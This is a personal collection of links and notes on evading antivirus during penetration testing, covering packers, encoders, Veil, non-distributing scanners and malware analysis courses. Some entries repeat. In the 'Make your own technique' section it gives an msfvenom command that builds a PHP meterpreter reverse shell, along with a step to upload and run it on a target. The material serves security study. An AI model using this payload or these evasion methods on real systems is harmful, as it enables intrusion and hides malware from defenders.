Bypass antivirus techniques - for Penetration Testing
http://ddoshackingarticles.blogspot.co.uk/2014/07/the-backdoor-factory-bdf.html
https://funoverip.net/category/hacking-cat/backdoor/
https://www.youtube.com/watch?v=5Uqnch7aJBY
https://www.youtube.com/watch?v=mnmeDfnaq7Q
http://netassist.dl.sourceforge.net/project/exe-p/EXE-P.zip
bamcompile.exe was not working
http://www.kitploit.com/2015/07/yargen-generator-for-yara-rules-for.html?utm_source=dlvr.it&utm_medium=twitter
http://razorscanner.com/index.php?page=home
http://v2.scan.majyx.net/?page=home
http://fuckingscan.me/
https://blog.mrg-effitas.com/stop-using-virustotal-to-measure-how-av-sucks/
Not to use: http://www.document-analyzer.net/
https://funoverip.net/category/hacking-cat/backdoor/
https://www.youtube.com/watch?v=5Uqnch7aJBY
https://www.youtube.com/watch?v=mnmeDfnaq7Q
http://netassist.dl.sourceforge.net/project/exe-p/EXE-P.zip
bamcompile.exe was not working
http://www.kitploit.com/2015/07/yargen-generator-for-yara-rules-for.html?utm_source=dlvr.it&utm_medium=twitter
Scanners
http://nodistribute.com/http://razorscanner.com/index.php?page=home
http://v2.scan.majyx.net/?page=home
http://fuckingscan.me/
https://blog.mrg-effitas.com/stop-using-virustotal-to-measure-how-av-sucks/
Not to use: http://www.document-analyzer.net/
Draw techniques for your template
http://www.informit.com/articles/article.aspx?p=328647&seqNum=3
http://www.functionx.com/win32/Lesson10.htm
http://www.codeproject.com/Articles/66250/BeginPaint-EndPaint-or-GetDC-ReleaseDC
http://stackoverflow.com/questions/12149906/validaterect-vs-beginpaint
http://stackoverflow.com/questions/7052411/is-there-something-special-about-using-beginpaint-endpain-and-not-getdc-released
http://stackoverflow.com/questions/5841299/difference-between-getdc-and-beginpaint
https://msdn.microsoft.com/en-us/library/xyfxza1c.aspx
https://msdn.microsoft.com/en-us/library/aa922023.aspx
https://msdn.microsoft.com/en-us/library/windows/desktop/dd183362(v=vs.85).aspx
Make your own technique
- Upload php.exe on the target and run the script created with msvenom
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
- https://www.offensive-security.com/metasploit-unleashed/msfvenom/
- http://netsec.ws/?p=331
- https://blog.malwarebytes.org/intelligence/2013/03/obfuscation-malwares-best-friend/
- http://reverseengineering.stackexchange.com/questions/1779/what-are-the-different-types-of-packers
- http://www.dfrws.org/2012/proceedings/DFRWS2012-2.pdf
- https://www.fireeye.com/blog/threat-research/2014/01/tracking-malware-import-hashing.html
- https://msdn.microsoft.com/en-us/library/windows/desktop/ms724482(v=vs.85).aspx
- Hex editor http://mh-nexus.de/en/downloads.php?product=HxD
- https://pentestlab.wordpress.com/2012/04/16/creating-an-undetectable-backdoor/
- https://www.oboom.com/JY73B700/0ww3j.Mastering.Metasploit.PDF.pdf
- http://securityxploded.com/bypassing-antivirus-using-code-injection.php
- https://www.youtube.com/watch?v=ZTpxTjzDuWE&spfreload=1 https://www.youtube.com/watch?v=k8RVlLQCHXg
- http://download.s3cur1ty.de/sonst/MSFu-extended-edt-1.0.pdf
- Evade https://www.securepla.net/antivirus-now-you-see-me-now-you-dont/
- https://pen-testing.sans.org/blog/pen-testing/2011/10/13/tips-for-evading-anti-virus-during-pen-testing
- http://pen-testing.sans.org/blog/2013/07/12/anti-virus-evasion-a-peek-under-the-veil
- http://www.yap0wnb.com/2014/07/bypassing-antivirus-heuristic-detection.html
- https://www.blackhat.com/docs/us-14/materials/us-14-Mesbahi-One-Packer-To-Rule-Them-All-WP.pdf
- https://dl.packetstormsecurity.net/papers/bypass/bypassing-av.pdf
- https://sathisharthars.wordpress.com/2014/05/26/evading-anti-virus-detection-using-encoders-in-metasploit/
- http://packetstorm.foofus.com/papers/virus/BypassAVDynamics.pdf
- http://www.slideshare.net/neelpathak009/antivirus-mechanisms-and
- https://www.veil-framework.com/veil-is-available-in-kali-linux/
- http://www.behindthefirewalls.com/2013/09/how-to-bypass-antivirus-using-veil-on.html
- chain msfvenom outpu https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom
- https://www.offensive-security.com/metasploit-unleashed/msfvenom/
- https://www.cybrary.it/0p3n/im-cuckoo-for-malware-malware-analysis-tutorial/?r=3
- https://www.cybrary.it/course/malware-analysis/
- https://blog.malwarebytes.org/intelligence/2012/09/so-you-want-to-be-a-malware-analyst/
Papers
- http://www.diva-portal.org/smash/get/diva2:730537/FULLTEXT01.pdf
- https://www.exploit-db.com/docs/20420.pdf
- http://cs.brown.edu/cgc/net.secbook/se01/handouts/Ch04-Malware.pdf
video
- https://www.youtube.com/watch?v=ycgaekqAkpA
- https://zeltser.com/malware-analysis-webcast/
- https://www.cybrary.it/video/advanced-exploitation-part-5/
Paid training
- https://www.fireeye.com/services/training/courses.html
- https://www.sans.org/course/reverse-engineering-malware-malware-analysis-tools-techniques
Books
- Page 115 of the book Black hat python
- Page 282 the hacker playbook 2